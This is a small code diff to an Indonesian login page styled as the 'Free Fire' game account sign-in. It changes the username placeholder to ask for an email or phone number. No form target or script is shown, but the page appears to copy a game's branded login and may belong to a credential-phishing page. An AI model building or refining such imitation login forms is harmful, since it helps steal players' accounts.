--- a/index.html
+++ b/index.html
@@ -11,7 +11,7 @@
         <img src="ff-logo.png" alt="Free Fire Logo" class="logo">
         <h2>Masuk ke Akun Free Fire</h2>
         <form id="login-form">
-            <input type="text" id="username" placeholder="Email atau ID" required>
+            <input type="text" id="username" placeholder="Email atau Nomor HP" required>
             <input type="password" id="password" placeholder="Password" required>
             <button type="submit">Login</button>
         </form>
